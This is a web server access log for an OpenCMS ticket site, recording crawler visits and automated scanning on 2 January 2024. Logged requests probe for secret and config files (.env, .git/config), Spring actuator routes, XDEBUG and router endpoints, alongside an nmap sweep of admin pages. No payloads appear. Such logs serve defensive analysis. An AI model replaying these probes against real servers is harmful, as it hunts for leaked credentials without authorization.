185.246.208.110 - - [02/Jan/2024:00:11:00 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
205.210.31.96 - - [02/Jan/2024:00:16:42 +0100] "GET / HTTP/1.0" 404 -
45.128.232.15 - - [02/Jan/2024:00:17:01 +0100] "CONNECT google.com:443 HTTP/1.1" 400 -
185.246.208.110 - - [02/Jan/2024:00:25:07 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
185.246.208.110 - - [02/Jan/2024:00:39:13 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
35.240.121.17 - - [02/Jan/2024:00:43:34 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
162.243.147.4 - - [02/Jan/2024:00:49:38 +0100] "GET /ticket2/opencms/owa/auth/x.js HTTP/1.1" 404 -
83.97.73.245 - - [02/Jan/2024:00:52:51 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
83.97.73.245 - - [02/Jan/2024:00:53:00 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67141
185.246.208.110 - - [02/Jan/2024:00:53:15 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
80.66.88.204 - - [02/Jan/2024:00:58:45 +0100] "/*?Cookie: mstshash=Administr " 400 -
45.32.181.201 - - [02/Jan/2024:00:59:52 +0100] "POST /ticket2/opencms/ HTTP/1.1" 302 -
107.170.224.62 - - [02/Jan/2024:01:02:45 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
162.221.192.26 - - [02/Jan/2024:01:04:56 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
45.32.181.201 - - [02/Jan/2024:01:14:19 +0100] "GET /ticket2/opencms/.env HTTP/1.1" 404 -
54.91.207.241 - - [02/Jan/2024:01:15:09 +0100] "GET /ticket2/opencms/app/.git/config HTTP/1.1" 404 -
185.246.208.110 - - [02/Jan/2024:01:38:15 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
83.97.73.245 - - [02/Jan/2024:01:44:01 +0100] "GET /ticket2/opencms/actuator/gateway/routes HTTP/1.1" 404 -
83.97.73.245 - - [02/Jan/2024:01:56:48 +0100] "GET /ticket2/opencms/geoserver HTTP/1.1" 404 -
52.167.144.174 - - [02/Jan/2024:01:56:49 +0100] "GET /ticket2/opencms/sitemap.xml HTTP/1.1" 200 37572
104.131.186.23 - - [02/Jan/2024:02:16:19 +0100] "GET /ticket2/opencms/.git/config HTTP/1.1" 404 -
78.108.177.54 - - [02/Jan/2024:02:17:20 +0100] "GET / HTTP/1.0" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:50 +0100] "GET / HTTP/1.0" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:56 +0100] "GET /ticket2/opencms/ HTTP/1.0" 500 -
143.42.63.237 - - [02/Jan/2024:02:43:56 +0100] "OPTIONS /ticket2/opencms/ HTTP/1.0" 200 -
143.42.63.237 - - [02/Jan/2024:02:43:56 +0100] "GET / HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:56 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
143.42.63.237 - - [02/Jan/2024:02:43:56 +0100] "GET /ticket2/opencms/.git/HEAD HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:56 +0100] "GET / HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:57 +0100] "GET /favicon.ico HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:57 +0100] "GET /ticket2/opencms/Portal0000.htm HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:57 +0100] "GET /.git/HEAD HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:57 +0100] "GET /ticket2/opencms/__Additional HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:57 +0100] "GET /ticket2/opencms/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 302 -
143.42.63.237 - - [02/Jan/2024:02:43:57 +0100] "GET /Portal0000.htm HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:57 +0100] "GET /ticket2/opencms/Portal/Portal.mwsl HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:57 +0100] "GET /__Additional HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:57 +0100] "GET /ticket2/opencms/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1" 302 -
143.42.63.237 - - [02/Jan/2024:02:43:57 +0100] "GET / HTTP/1.0" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:57 +0100] "GET /ticket2/opencms/docs/cplugError.html/ HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:57 +0100] "HEAD / HTTP/1.0" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:58 +0100] "GET /Portal/Portal.mwsl HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:58 +0100] "CONNECT www.google.com:80 HTTP/1.0" 400 -
143.42.63.237 - - [02/Jan/2024:02:43:58 +0100] "-" 400 -
143.42.63.237 - - [02/Jan/2024:02:43:58 +0100] "GET /docs/cplugError.html/ HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:58 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67141
143.42.63.237 - - [02/Jan/2024:02:43:58 +0100] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406
143.42.63.237 - - [02/Jan/2024:02:43:58 +0100] "GET /ticket2/opencms/nmaplowercheck1704160262 HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:58 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67141
143.42.63.237 - - [02/Jan/2024:02:43:58 +0100] "GET /ticket2/opencms/pools/default/buckets HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:58 +0100] "GET /CSS/Miniweb.css HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:58 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67141
143.42.63.237 - - [02/Jan/2024:02:43:59 +0100] "GET /ticket2/opencms/pools HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:59 +0100] "GET /Fj8t HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:59 +0100] "GET /localstart.shtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:59 +0100] "POST /sdk HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:59 +0100] "GET /start.jhtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:59 +0100] "GET /nmaplowercheck1704160262 HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:59 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
143.42.63.237 - - [02/Jan/2024:02:43:59 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67141
143.42.63.237 - - [02/Jan/2024:02:43:59 +0100] "GET /localstart.aspx HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:59 +0100] "GET /pools/default/buckets HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:59 +0100] "GET /home.jhtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:59 +0100] "GET /pools HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:59 +0100] "GET /ticket2/opencms/HNAP1 HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:59 +0100] "GET /default.shtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:59 +0100] "HEAD / HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:59 +0100] "GET /default.cfm HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:59 +0100] "GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:59 +0100] "GET /server-status HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:43:59 +0100] "GET /HNAP1 HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:00 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67141
143.42.63.237 - - [02/Jan/2024:02:44:00 +0100] "GET /start.php HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:00 +0100] "GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:00 +0100] "GET / HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:00 +0100] "POST /scripts/WPnBr.dll HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:00 +0100] "GET /robots.txt HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:00 +0100] "GET / HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:00 +0100] "GET /base.cgi HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:00 +0100] "POST /ticket2/opencms/scripts/WPnBr.dll HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:00 +0100] "GET /base.cfm HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:00 +0100] "GET /index.pl HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:00 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
143.42.63.237 - - [02/Jan/2024:02:44:00 +0100] "GET /readme.txt HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:00 +0100] "GET /ticket2/opencms/ HTTP/1.0" 500 -
143.42.63.237 - - [02/Jan/2024:02:44:01 +0100] "GET /admin.shtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:01 +0100] "GET /home.jsp HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:01 +0100] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
143.42.63.237 - - [02/Jan/2024:02:44:01 +0100] "GET /start.html HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:01 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67141
143.42.63.237 - - [02/Jan/2024:02:44:01 +0100] "GET /home.shtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:01 +0100] "GET /ticket2/opencms/ZZOY HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:01 +0100] "GET /menu.jsa HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:01 +0100] "GET /ticket2/opencms/CSS/Miniweb.css HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:01 +0100] "GET /inicio.jhtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:01 +0100] "POST /ticket2/opencms/sdk HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:01 +0100] "GET /admin.pl HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:02 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
143.42.63.237 - - [02/Jan/2024:02:44:02 +0100] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
143.42.63.237 - - [02/Jan/2024:02:44:02 +0100] "GET /start.pl HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:02 +0100] "GET /index.shtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:02 +0100] "GET /home.pl HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:02 +0100] "GET /admin.php HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:02 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67141
143.42.63.237 - - [02/Jan/2024:02:44:02 +0100] "GET / HTTP/1.0" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:02 +0100] "GET /admin.jsp HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:02 +0100] "GET /admin.jsa HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:03 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67141
143.42.63.237 - - [02/Jan/2024:02:44:03 +0100] "GET /index.html HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:03 +0100] "GET /ticket2/opencms/localstart.shtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:03 +0100] "GET /inicio.aspx HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:03 +0100] "GET /ticket2/opencms/start.jhtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:03 +0100] "GET /default.jhtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:03 +0100] "GET /menu.shtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:03 +0100] "GET /ticket2/opencms/localstart.aspx HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:03 +0100] "GET /inicio.php HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:03 +0100] "GET /index.jsp HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:03 +0100] "GET /ticket2/opencms/home.jhtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:04 +0100] "GET /start.aspx HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:04 +0100] "GET /ticket2/opencms/default.shtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:04 +0100] "GET /menu.cgi HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:04 +0100] "GET /home.asp HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:04 +0100] "GET /ticket2/opencms/default.cfm HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:04 +0100] "GET /indice.jsa HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:04 +0100] "GET /admin.cfm HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:04 +0100] "GET /ticket2/opencms/start.php HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:04 +0100] "GET /admin.aspx HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:04 +0100] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
143.42.63.237 - - [02/Jan/2024:02:44:05 +0100] "GET /menu.pl HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:05 +0100] "GET /base.shtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:05 +0100] "GET /ticket2/opencms/base.cgi HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:05 +0100] "GET /default.html HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:05 +0100] "GET /indice.cgi HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:05 +0100] "GET /ticket2/opencms/base.cfm HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:05 +0100] "GET /default.aspx HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:05 +0100] "GET /ticket2/opencms/index.pl HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:05 +0100] "GET /base.php HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:05 +0100] "GET /localstart.php HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:06 +0100] "GET /ticket2/opencms/readme.txt HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:06 +0100] "GET /start.jsa HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:06 +0100] "GET /base.jsp HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:06 +0100] "GET /ticket2/opencms/admin.shtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:06 +0100] "GET /inicio.pl HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:06 +0100] "GET /ticket2/opencms/home.jsp HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:06 +0100] "GET /index.aspx HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:06 +0100] "GET /menu.asp HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:06 +0100] "GET /ticket2/opencms/start.html HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:06 +0100] "GET /base.jhtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:07 +0100] "GET /indice.aspx HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:07 +0100] "GET /ticket2/opencms/home.shtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:07 +0100] "GET /menu.html HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:07 +0100] "GET /ticket2/opencms/menu.jsa HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:07 +0100] "GET /base.html HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:07 +0100] "GET /indice.asp HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:07 +0100] "GET /index.asp HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:07 +0100] "GET /base.jsa HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:08 +0100] "GET /start.cgi HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:08 +0100] "GET /indice.shtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:08 +0100] "GET /main.php HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:08 +0100] "GET /home.cfm HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:08 +0100] "GET default.asp HTTP/1.1" 400 -
143.42.63.237 - - [02/Jan/2024:02:44:08 +0100] "GET /home.aspx HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:08 +0100] "GET /indice.jsp HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:09 +0100] "GET /start.asp HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:09 +0100] "GET /indice.jhtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:09 +0100] "GET /indice.html HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:09 +0100] "GET /default.pl HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:09 +0100] "GET /base.pl HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:09 +0100] "GET /indice.cfm HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:10 +0100] "GET /home.html HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:10 +0100] "GET /base.inc HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:10 +0100] "GET /main.shtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:10 +0100] "GET /menu.cfm HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:10 +0100] "GET /inicio.html HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:10 +0100] "GET /inicio.shtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:11 +0100] "GET /base.aspx HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:11 +0100] "GET /menu.jsp HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:11 +0100] "GET /inicio.jsp HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:11 +0100] "GET /main.jsa HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:11 +0100] "GET /index.cgi HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:11 +0100] "GET /inicio.jsa HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:11 +0100] "GET /inicio.cgi HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:12 +0100] "GET /localstart.jhtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:12 +0100] "GET /admin.jhtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:12 +0100] "GET /inicio.asp HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:12 +0100] "GET /menu.jhtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:12 +0100] "GET /localstart.cgi HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:12 +0100] "GET /main.pl HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:13 +0100] "GET /default.jsa HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:13 +0100] "GET /localstart.jsp HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:13 +0100] "GET /home.jsa HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:13 +0100] "GET /localstart.jsa HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:13 +0100] "GET /inicio.cfm HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:13 +0100] "GET /main.cgi HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:13 +0100] "GET /home.cgi HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:14 +0100] "GET /default.cgi HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:14 +0100] "GET /start.jsp HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:14 +0100] "GET /localstart.pl HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:14 +0100] "GET /localstart.cfm HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:14 +0100] "GET /index.php HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:14 +0100] "GET /home.php HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:15 +0100] "GET /main.cfm HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:15 +0100] "GET /main.jsp HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:15 +0100] "GET /localstart.asp HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:15 +0100] "GET /start.shtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:15 +0100] "GET /main.aspx HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:15 +0100] "GET /index.jsa HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:15 +0100] "GET /localstart.html HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:16 +0100] "GET /indice.php HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:16 +0100] "GET /menu.php HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:16 +0100] "GET /main.asp HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:16 +0100] "GET /index.jhtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:16 +0100] "GET /default.jsp HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:16 +0100] "GET /base.asp HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:17 +0100] "GET /index.cfm HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:17 +0100] "GET /start.cfm HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:17 +0100] "GET /default.php HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:17 +0100] "GET /admin.cgi HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:17 +0100] "GET /main.html HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:17 +0100] "GET /indice.pl HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:17 +0100] "GET /main.jhtml HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:18 +0100] "GET /menu.aspx HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:18 +0100] "GET /admin.asp HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:18 +0100] "GET /default.asp HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:18 +0100] "GET /admin.html HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:19 +0100] "GET / HTTP/1.0" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:19 +0100] "GET / HTTP/1.1" 404 -
143.42.63.237 - - [02/Jan/2024:02:44:19 +0100] "GET /ticket2/opencms/ HTTP/1.0" 500 -
143.42.63.237 - - [02/Jan/2024:02:44:20 +0100] "GET /ticket2/opencms/ HTTP/1.1" 500 -
52.167.144.54 - - [02/Jan/2024:03:06:11 +0100] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
52.167.144.54 - - [02/Jan/2024:03:06:12 +0100] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
52.167.144.225 - - [02/Jan/2024:03:06:26 +0100] "GET /ticket2/opencms/sv/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=70B37487-FE30-D476-CAE7-E6AFEA3153F2 HTTP/1.1" 200 74778
167.99.201.120 - - [01/Jan/1970:00:59:59 +0100] "-" 400 -
83.97.73.245 - - [02/Jan/2024:03:19:57 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
83.97.73.245 - - [02/Jan/2024:03:20:00 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67141
185.246.208.110 - - [02/Jan/2024:03:27:34 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
54.91.207.241 - - [02/Jan/2024:03:41:25 +0100] "GET /ticket2/opencms/admin/.git/config HTTP/1.1" 404 -
104.243.37.151 - - [02/Jan/2024:03:55:23 +0100] "GET /ticket2/opencms/analytics/1702603200000/14565770.js HTTP/1.1" 404 -
123.254.111.109 - - [02/Jan/2024:04:03:26 +0100] "GET /ticket2/opencms/ HTTP/1.1" 500 -
123.254.111.109 - - [02/Jan/2024:04:03:32 +0100] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406
123.254.111.109 - - [02/Jan/2024:04:03:42 +0100] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
123.254.111.109 - - [02/Jan/2024:04:03:49 +0100] "GET /ticket2/opencms/sitemap.xml HTTP/1.1" 200 37572
123.254.111.109 - - [02/Jan/2024:04:03:53 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
123.254.111.109 - - [02/Jan/2024:04:03:58 +0100] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406
38.222.26.41 - - [02/Jan/2024:04:09:39 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 -
83.97.73.245 - - [02/Jan/2024:04:22:48 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 404 -
104.243.37.151 - - [02/Jan/2024:04:33:09 +0100] "GET /ticket2/opencms/v2/14565770/banner.js HTTP/1.1" 404 -
45.128.232.152 - - [02/Jan/2024:04:33:13 +0100] "CONNECT google.com:443 HTTP/1.1" 400 -
83.97.73.245 - - [02/Jan/2024:04:46:59 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 -
185.246.208.110 - - [02/Jan/2024:04:52:53 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
104.243.37.151 - - [02/Jan/2024:05:12:20 +0100] "GET /ticket2/opencms/public/js/click/main2.js HTTP/1.1" 404 -
185.246.208.110 - - [02/Jan/2024:05:14:03 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
78.108.177.50 - - [02/Jan/2024:05:14:32 +0100] "GET / HTTP/1.0" 404 -
192.241.213.36 - - [02/Jan/2024:05:22:56 +0100] "GET / HTTP/1.1" 404 -
164.90.202.89 - - [02/Jan/2024:05:28:49 +0100] "GET / HTTP/1.1" 404 -
185.246.208.110 - - [02/Jan/2024:05:34:57 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
104.243.37.151 - - [02/Jan/2024:05:51:28 +0100] "GET /ticket2/opencms/public/js/click/main.js HTTP/1.1" 404 -
35.202.9.133 - - [02/Jan/2024:05:53:36 +0100] "GET / HTTP/1.1" 404 -
185.246.208.110 - - [02/Jan/2024:05:55:46 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
54.91.207.241 - - [02/Jan/2024:05:56:49 +0100] "GET /ticket2/opencms/src/.git/config HTTP/1.1" 404 -
71.6.232.24 - - [02/Jan/2024:06:00:07 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
198.235.24.67 - - [02/Jan/2024:06:00:12 +0100] "GET / HTTP/1.1" 404 -
54.91.207.241 - - [02/Jan/2024:06:05:33 +0100] "GET /ticket2/opencms/node_modules/.git/config HTTP/1.1" 404 -
